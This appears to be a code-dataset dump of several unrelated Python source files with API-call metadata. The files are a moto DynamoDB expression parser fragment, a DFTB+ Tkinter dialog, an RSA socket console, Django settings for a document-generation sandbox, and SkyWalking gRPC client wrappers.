UpdateExpressionDeleteActions class UpdateExpressionDeleteActionParser(UpdateExpressionPathValueParser): @classmethod def _is_possible_start(cls, token): return UpdateExpressionPathParser.is_possible_start(token) def _parse(self): return UpdateExpressionDeleteAction(children=self._parse_path_and_value())
[((130, 1, 130, 31), 'six.add_metaclass', 'six.add_metaclass', ({(130, 19, 130, 30): 'abc.ABCMeta'}, {}), '(abc.ABCMeta)', False, 'import six\n'), ((971, 1, 971, 31), 'six.add_metaclass', 'six.add_metaclass', ({(971, 19, 971, 30): 'abc.ABCMeta'}, {}), '(abc.ABCMeta)', False, 'import six\n'), ((54, 30, 54, 37), 'collections.deque', 'deque', ({}, {}), '()', False, 'from collections import deque\n'), ((320, 14, 320, 60), 'moto.dynamodb2.exceptions.InvalidTokenException', 'InvalidTokenException', ({(320, 36, 320, 53): 'problematic_token', (320, 55, 320, 59): 'near'}, {}), '(problematic_token, near)', False, 'from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression\n'), ((344, 28, 344, 35), 'collections.deque', 'deque', ({}, {}), '()', False, 'from collections import deque\n'), ((493, 21, 493, 66), 'moto.dynamodb2.parsing.tokens.ExpressionTokenizer.make_list', 'ExpressionTokenizer.make_list', ({(493, 51, 493, 65): 'expression_str'}, {}), '(expression_str)', False, 'from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer\n'), ((513, 15, 513, 56), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionSetClause', 'UpdateExpressionSetClause', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((617, 15, 617, 64), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionSetAction', 'UpdateExpressionSetAction', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((652, 15, 652, 61), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionPath', 'UpdateExpressionPath', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((743, 15, 743, 59), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionGroupedValue', 'UpdateExpressionGroupedValue', (), '', False, 
'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((761, 15, 761, 55), 'moto.dynamodb2.parsing.ast_nodes.ExpressionValueOperator', 'ExpressionValueOperator', ({(761, 39, 761, 54): 'operation_value'}, {}), '(operation_value)', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((879, 15, 879, 67), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionFunction', 'UpdateExpressionFunction', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((894, 15, 894, 59), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionRemoveClause', 'UpdateExpressionRemoveClause', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((939, 15, 939, 60), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionRemoveAction', 'UpdateExpressionRemoveAction', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, 
ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((950, 15, 950, 56), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionAddClause', 'UpdateExpressionAddClause', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((1013, 15, 1013, 59), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionDeleteClause', 'UpdateExpressionDeleteClause', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((681, 31, 681, 56), 'moto.dynamodb2.parsing.ast_nodes.ExpressionPathDescender', 'ExpressionPathDescender', ({}, {}), '()', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((716, 31, 716, 65), 'moto.dynamodb2.parsing.ast_nodes.ExpressionSelector', 'ExpressionSelector', ({(716, 50, 716, 64): 'selector_value'}, {}), '(selector_value)', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((865, 18, 865, 56), 
'moto.dynamodb2.exceptions.InvalidUpdateExpression', 'InvalidUpdateExpression', ({(865, 42, 865, 55): 'function_name'}, {}), '(function_name)', False, 'from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression\n'), ((280, 12, 280, 66), 'logging.debug', 'logging.debug', ({(280, 26, 280, 65): '"""We are out of range so end is reached"""'}, {}), "('We are out of range so end is reached')", False, 'import logging\n'), ((482, 16, 482, 44), 'logging.debug', 'logging.debug', ({(482, 30, 482, 43): '"""End reached"""'}, {}), "('End reached')", False, 'import logging\n')]
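The parser classes in the moto record above all follow one dispatch convention: each parser reports via is_possible_start whether it can consume the next token, and composite parsers try their sub-factories in order, returning a node together with the new token position. The following is a minimal, self-contained sketch of that pattern with tokens reduced to plain strings; none of these classes are moto's actual API.

class NumberParser:
    @staticmethod
    def is_possible_start(token):
        return token.isdigit()

    @staticmethod
    def parse(tokens, pos):
        return int(tokens[pos]), pos + 1


class NameParser:
    @staticmethod
    def is_possible_start(token):
        return token.isalpha()

    @staticmethod
    def parse(tokens, pos):
        return tokens[pos], pos + 1


class OperandParser:
    # mirrors the _sub_factories() lookup used by UpdateExpressionOperandParser above
    sub_factories = [NumberParser, NameParser]

    @classmethod
    def parse(cls, tokens, pos):
        for factory in cls.sub_factories:
            if factory.is_possible_start(tokens[pos]):
                return factory.parse(tokens, pos)
        raise ValueError("unexpected token: " + tokens[pos])


print(OperandParser.parse(["price", "3"], 0))  # ('price', 1)
print(OperandParser.parse(["price", "3"], 1))  # (3, 2)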
molssi-seamm/dftbplus_step
dftbplus_step/tk_optimization.py
e5b9c7462d92c25fc6f27db5e4324b05bb42e224
# -*- coding: utf-8 -*- """The graphical part of a DFTB+ Optimization node""" import logging import tkinter as tk import tkinter.ttk as ttk import dftbplus_step logger = logging.getLogger(__name__) class TkOptimization(dftbplus_step.TkEnergy): def __init__( self, tk_flowchart=None, node=None, canvas=None, x=120, y=20, w=200, h=50, my_logger=logger, keyword_metadata=None, ): """Initialize the graphical Tk DFTB+ optimization step Keyword arguments: """ self.results_widgets = [] super().__init__( tk_flowchart=tk_flowchart, node=node, canvas=canvas, x=x, y=y, w=w, h=h, my_logger=my_logger, keyword_metadata=keyword_metadata, ) def right_click(self, event): """Probably need to add our dialog...""" super().right_click(event) self.popup_menu.add_command(label="Edit..", command=self.edit) self.popup_menu.tk_popup(event.x_root, event.y_root, 0) def create_dialog( self, title="Edit DFTB+ Optimization Step", calculation="optimization" ): """Create the dialog!""" self.logger.debug("Creating the dialog") super().create_dialog(title=title, calculation=calculation) # Create all the widgets P = self.node.parameters # Frame to isolate widgets opt_frame = self["optimization frame"] = ttk.LabelFrame( self["frame"], borderwidth=4, relief="sunken", text="Optimization Parameters", labelanchor="n", padding=10, ) for key in dftbplus_step.OptimizationParameters.parameters: self[key] = P[key].widget(opt_frame) self.logger.debug("Finished creating the dialog") def reset_dialog(self, widget=None): super().reset_dialog() row = 0 self["optimization frame"].grid(row=row, column=1, sticky=tk.EW) row += 1 # And the widgets in our frame self.reset_optimization_frame() return row def reset_optimization_frame(self): """Layout the optimization frame according to the current values. SD CG gDIIS LBFGS FIRE ------------------ ------------------- ------------------- ------------------- -------- MovedAtoms MovedAtoms MovedAtoms MovedAtoms TimeStep MaxForceComponent MaxForceComponent MaxForceComponent MaxForceComponent MaxSteps MaxSteps MaxSteps MaxSteps OutputPrefix OutputPrefix OutputPrefix OutputPrefix AppendGeometries AppendGeometries AppendGeometries AppendGeometries Constraints Constraints Constraints Constraints LatticeOpt LatticeOpt LatticeOpt LatticeOpt FixAngles FixAngles FixAngles FixAngles FixLengths Isotropic Isotropic Isotropic Isotropic Pressure Pressure Pressure Pressure MaxAtomStep MaxAtomStep MaxAtomStep MaxLatticeStep MaxLatticeStep MaxLatticeStep MaxLatticeStep ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly StepSize Alpha Memory Generations LineSearch """ # noqa: E501 frame = self["optimization frame"] for slave in frame.grid_slaves(): slave.grid_forget() method = self["optimization method"].get() widgets = [] widgets1 = [] row = 0 w = self["optimization method"] w.grid(row=row, column=0, columnspan=2, sticky=tk.EW) widgets.append(w) row += 1 if method == "Steepest descents": w = self["StepSize"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 elif "gDIIS" in method: w = self["Alpha"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 w = self["Generations"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 elif "LBFGS" in method: w = self["Memory"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 w = self["LineSearch"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 for widget in ( "MaxForceComponent", "MaxSteps", "MaxAtomStep", "stop_if_scc_fails", ): w = self[widget] 
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW) widgets.append(w) row += 1 return row
[((11, 9, 11, 36), 'logging.getLogger', 'logging.getLogger', ({(11, 27, 11, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((64, 49, 71, 9), 'tkinter.ttk.LabelFrame', 'ttk.LabelFrame', (), '', True, 'import tkinter.ttk as ttk\n')]
aplneto/redes_projeto
console.py
450ef8ac61e46bc38ff34142d07eda3d726ce326
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """Módulo de configuração dos consoles """ from Crypto.PublicKey import RSA import socket import os import base64 class Console(object): """Superclasse Console Classe base para os terminais de cliente e servidor. Attributes: logged (bool): True caso o usuário tenha realizado o login com sucesso, False caso contrário """ def __init__(self, **kwargs): """Método construtor do console Kwargs: sock (socket): socket de comunicação key_file (str): arquivo para inicialização de par de chaves """ self.sock = kwargs.get('sock', socket.socket(socket.AF_INET, socket.SOCK_STREAM)) key_file = kwargs.get('key_file', '') if key_file: self.privatekey, self.publickey = Console.start_key(key_file) def run(self): """Método run difere entre o Console do Host e o do Client O Método run controla o comportamento do objeto como um todo. Todo o comportamento de um console individual deve ser definido dentro do método run. """ raise NotImplemented @staticmethod def start_key(key_file): """Método de inicialização das chaves Esse método inicializa a chave privada e prepara, também, a chave pública para envio. Args: key_file (str): endereço do arquivo da chave privada Returns: (tuple) uma tupla contendo um par _RSAobj (chave privada) e byte (inicializador da chave pública) """ try: keyfile = open(key_file, 'rb') except FileNotFoundError: private_key = RSA.generate(1024) else: private_key = RSA.importKey(keyfile.read()) keyfile.close() finally: public_key = private_key.publickey().exportKey() return private_key, public_key def receive_key(self): """Troca de chaves no início da comunicação Ao se conectarem, servidor e cliente trocam suas chaves públicas um com o outro. Esse método retorna um objeto do tipo RSA público a partir da chave pública recebida através de um socket. Returns: (_RSAobj) chave pública para criptografia. """ k = self.sock.recv(1024) key = RSA.importKey(k) return key def send(self, msg): """Método send envia strings simples através do socket O Método send é o método usado apara enviar mensagens simples através de um socket. Dentro desse método ocorrem as criptografias RSA e base64 antes do envio." Args: msg (str ou bytes): mensagem a ser enviada """ msg = self.encrypt(msg) self.sock.send(msg) def receive(self, b = 160): """Método receive recebe mensagens simples através do socket É através desse método que o usuário recebe mensagens simples através do socket. As mensagens chegam criptografadas e a descriptografia acontece dentro do método receive. Args: b (int): quantidade de bytes a serem recebidos Returns: (str) mensagem decifrada """ msg = self.decrypt(self.sock.recv(b)) return msg.decode('utf-8') def encrypt(self, msg): """Criptografia de uma string ou trecho de bytes Args: msg (str ou bytes): string ou bytes a serem criptografados. Returns: (bytes) segmento de bytes criptografados """ if isinstance(msg, str): msg = msg.encode('utf-8') msg = self.publickey.encrypt(msg, 3.14159265359) msg = base64.a85encode(msg[0]) return msg def decrypt(self, msg): """Método de conversão de um trecho criptografado Args: msg (bytes): trecho de mensagem a ser decifrado Returns: (bytes): trecho de bytes decifrados """ msg = base64.a85decode(msg) msg = self.privatekey.decrypt(msg) return msg def send_file(self, filename): """Rotina de envio de arquivos através de sockets Esse método controla o envio sequencial de segmentos de um arquivo através de um socket, gerando a cada envio um número inteiro referente a quantidade de bytes enviados até o momento. 
Método deve ser usado como um gerador. Veja exemplo abaixo. Example: for b in self.sendfile('alice.txt'): if b == -1: print("Houve um erro na transferência") else: print(str(b) + "de " str(file_size) "bytes enviados") Args: filename (str): endereço do arquivo Yields: (int) quantidade de bytes enviados ou -1, em caso de erro """ size = os.path.getsize(filename) self.send(str(size)) sent = 0 file = open(filename, 'rb') while sent < size: ack = self.receive() nxt = file.read(1024) self.sock.send(nxt) sent += len(nxt) yield sent file.close() def receive_file(self, filename): """Rotina de recebimento de arquivos através de sockets Esse método controla o recebeimendo de sementos de arquivos através de um socket. O método gera a quantidade de bytes recebidos a cada nova mensagem recebida do socket, por tanto, deve ser usado como um gerador. Example: for b in receive_file(filename): print(str(b) + " de " str(filesize) " bytes recebidos.") Args: filename(str): nome do arquivo Yields: (int) quantidade de bytes recebidos """ size = int(self.receive()) file = open(filename, 'wb') rcvd = 0 while rcvd < size: self.send('ack') nxt = self.sock.recv(1024) rcvd += len(nxt) file.write(nxt) yield rcvd file.close() def __repr__(self): return "{0}({1}, {2}, key_file = {3})".format(self.__class__.__name__, self.sock.__repr__(), self.client.__repr__(), repr(self.key_file))
[((85, 14, 85, 30), 'Crypto.PublicKey.RSA.importKey', 'RSA.importKey', ({(85, 28, 85, 29): 'k'}, {}), '(k)', False, 'from Crypto.PublicKey import RSA\n'), ((132, 14, 132, 38), 'base64.a85encode', 'base64.a85encode', ({(132, 31, 132, 37): 'msg[0]'}, {}), '(msg[0])', False, 'import base64\n'), ((144, 14, 144, 35), 'base64.a85decode', 'base64.a85decode', ({(144, 31, 144, 34): 'msg'}, {}), '(msg)', False, 'import base64\n'), ((172, 15, 172, 40), 'os.path.getsize', 'os.path.getsize', ({(172, 31, 172, 39): 'filename'}, {}), '(filename)', False, 'import os\n'), ((32, 31, 33, 64), 'socket.socket', 'socket.socket', ({(32, 45, 32, 59): 'socket.AF_INET', (33, 45, 33, 63): 'socket.SOCK_STREAM'}, {}), '(socket.AF_INET, socket.SOCK_STREAM)', False, 'import socket\n'), ((65, 26, 65, 44), 'Crypto.PublicKey.RSA.generate', 'RSA.generate', ({(65, 39, 65, 43): '1024'}, {}), '(1024)', False, 'from Crypto.PublicKey import RSA\n')]
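console.py above layers RSA encryption with Ascii85 framing before writing to the socket. A small standard-library sketch of just the framing step used by encrypt()/decrypt(), with an arbitrary byte string standing in for the RSA ciphertext:

import base64

ciphertext = bytes(range(256))        # stand-in for RSA output: arbitrary binary data
framed = base64.a85encode(ciphertext)  # ASCII-safe form for transport, as in encrypt()
assert base64.a85decode(framed) == ciphertext  # decrypt() reverses the framing first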
OmenApps/marion
sandbox/settings.py
f501674cafbd91f0bbad7454e4dcf3527cf4445e
""" Django settings for marion project. """ from pathlib import Path from tempfile import mkdtemp from configurations import Configuration, values BASE_DIR = Path(__file__).parent.resolve() DATA_DIR = Path("/data") # pylint: disable=no-init class Base(Configuration): """ This is the base configuration every configuration (aka environnement) should inherit from. It is recommended to configure third-party applications by creating a configuration mixins in ./configurations and compose the Base configuration with those mixins. It depends on an environment variable that SHOULD be defined: * DJANGO_SECRET_KEY You may also want to override default configuration by setting the following environment variables: * DB_NAME * DB_HOST * DB_PASSWORD * DB_USER """ DEBUG = False # Security ALLOWED_HOSTS = [] SECRET_KEY = values.Value(None) # SECURE_PROXY_SSL_HEADER allows to fix the scheme in Django's HttpRequest # object when you application is behind a reverse proxy. # # Keep this SECURE_PROXY_SSL_HEADER configuration only if : # - your Django app is behind a proxy. # - your proxy strips the X-Forwarded-Proto header from all incoming requests # - Your proxy sets the X-Forwarded-Proto header and sends it to Django # # In other cases, you should comment the following line to avoid security issues. SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https") AUTH_PASSWORD_VALIDATORS = [ { "NAME": ( "django.contrib.auth.password_validation." "UserAttributeSimilarityValidator" ), }, {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"}, {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"}, {"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"}, ] # Application ROOT_URLCONF = "urls" WSGI_APPLICATION = "wsgi.application" # Database DATABASES = { "default": { "ENGINE": values.Value( "django.db.backends.postgresql_psycopg2", environ_name="DB_ENGINE", environ_prefix=None, ), "NAME": values.Value("marion", environ_name="DB_NAME", environ_prefix=None), "USER": values.Value("fun", environ_name="DB_USER", environ_prefix=None), "PASSWORD": values.Value( "pass", environ_name="DB_PASSWORD", environ_prefix=None ), "HOST": values.Value( "localhost", environ_name="DB_HOST", environ_prefix=None ), "PORT": values.Value(5432, environ_name="DB_PORT", environ_prefix=None), } } # Static files (CSS, JavaScript, Images) STATIC_URL = "/static/" STATIC_ROOT = DATA_DIR.joinpath("static") MEDIA_URL = "/media/" MEDIA_ROOT = DATA_DIR.joinpath("media") # Internationalization LANGUAGE_CODE = "en-us" TIME_ZONE = "UTC" USE_I18N = True USE_L10N = True USE_TZ = True # Application definition INSTALLED_APPS = [ "django.contrib.admin", "django.contrib.auth", "django.contrib.contenttypes", "django.contrib.sessions", "django.contrib.messages", "django.contrib.staticfiles", "rest_framework", "marion", ] MIDDLEWARE = [ "django.middleware.security.SecurityMiddleware", "django.contrib.sessions.middleware.SessionMiddleware", "django.middleware.common.CommonMiddleware", "django.middleware.csrf.CsrfViewMiddleware", "django.contrib.auth.middleware.AuthenticationMiddleware", "django.contrib.messages.middleware.MessageMiddleware", "django.middleware.clickjacking.XFrameOptionsMiddleware", ] TEMPLATES = [ { "BACKEND": "django.template.backends.django.DjangoTemplates", "DIRS": [], "APP_DIRS": True, "OPTIONS": { "context_processors": [ "django.template.context_processors.debug", "django.template.context_processors.request", "django.contrib.auth.context_processors.auth", 
"django.contrib.messages.context_processors.messages", ], }, }, ] class Development(Base): """ Development environment settings We set DEBUG to True and configure the server to respond from all hosts. """ DEBUG = True ALLOWED_HOSTS = ["*"] ROOT_URLCONF = "urls.debug" # Application definition INSTALLED_APPS = Base.INSTALLED_APPS + [ "howard", ] MARION_DOCUMENT_ISSUER_CHOICES_CLASS = "howard.defaults.DocumentIssuerChoices" class Test(Base): """Test environment settings""" MEDIA_ROOT = Path(mkdtemp()) ROOT_URLCONF = "urls.debug"
[((11, 11, 11, 24), 'pathlib.Path', 'Path', ({(11, 16, 11, 23): '"""/data"""'}, {}), "('/data')", False, 'from pathlib import Path\n'), ((39, 17, 39, 35), 'configurations.values.Value', 'values.Value', ({(39, 30, 39, 34): 'None'}, {}), '(None)', False, 'from configurations import Configuration, values\n'), ((162, 22, 162, 31), 'tempfile.mkdtemp', 'mkdtemp', ({}, {}), '()', False, 'from tempfile import mkdtemp\n'), ((10, 11, 10, 25), 'pathlib.Path', 'Path', ({(10, 16, 10, 24): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n'), ((71, 22, 75, 13), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((76, 20, 76, 87), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((77, 20, 77, 84), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((78, 24, 80, 13), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((81, 20, 83, 13), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((84, 20, 84, 83), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n')]
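In the marion settings above, each database entry is a django-configurations Value declared with environ_prefix=None, so the bare variable names (DB_NAME, DB_HOST, ...) override the declared defaults. A hedged sketch of pointing the sandbox at another database purely through the environment; the variable values and the settings module name are examples only:

import os

os.environ["DJANGO_SETTINGS_MODULE"] = "settings"   # assumed name of the sandbox settings module
os.environ["DJANGO_CONFIGURATION"] = "Development"  # which Configuration class to activate
os.environ["DB_NAME"] = "marion_ci"
os.environ["DB_HOST"] = "postgres"
# Once django-configurations is set up (e.g. via configurations.setup()),
# DATABASES["default"]["NAME"] resolves to "marion_ci" instead of the default "marion".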
cooolr/skywalking-python
skywalking/client/grpc.py
42176ff4b732000f2a75eac1affee2a681379df7
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import grpc from skywalking.protocol.common.Common_pb2 import KeyStringValuePair from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub from skywalking import config from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \ LogDataReportService from skywalking.command import command_service from skywalking.loggings import logger from skywalking.profile import profile_task_execution_service class GrpcServiceManagementClient(ServiceManagementClient): def __init__(self, channel: grpc.Channel): self.service_stub = ManagementServiceStub(channel) def send_instance_props(self): self.service_stub.reportInstanceProperties(InstanceProperties( service=config.service_name, serviceInstance=config.service_instance, properties=[KeyStringValuePair(key='language', value='Python')], )) def send_heart_beat(self): logger.debug( 'service heart beats, [%s], [%s]', config.service_name, config.service_instance, ) self.service_stub.keepAlive(InstancePingPkg( service=config.service_name, serviceInstance=config.service_instance, )) class GrpcTraceSegmentReportService(TraceSegmentReportService): def __init__(self, channel: grpc.Channel): self.report_stub = TraceSegmentReportServiceStub(channel) def report(self, generator): self.report_stub.collect(generator) class GrpcLogDataReportService(LogDataReportService): def __init__(self, channel: grpc.Channel): self.report_stub = LogReportServiceStub(channel) def report(self, generator): self.report_stub.collect(generator) class GrpcProfileTaskChannelService(ProfileTaskChannelService): def __init__(self, channel: grpc.Channel): self.task_stub = ProfileTaskStub(channel) def do_query(self): query = ProfileTaskCommandQuery( service=config.service_name, serviceInstance=config.service_instance, lastCommandTime=profile_task_execution_service.get_last_command_create_time() ) commands = self.task_stub.getProfileTaskCommands(query) command_service.receive_command(commands)
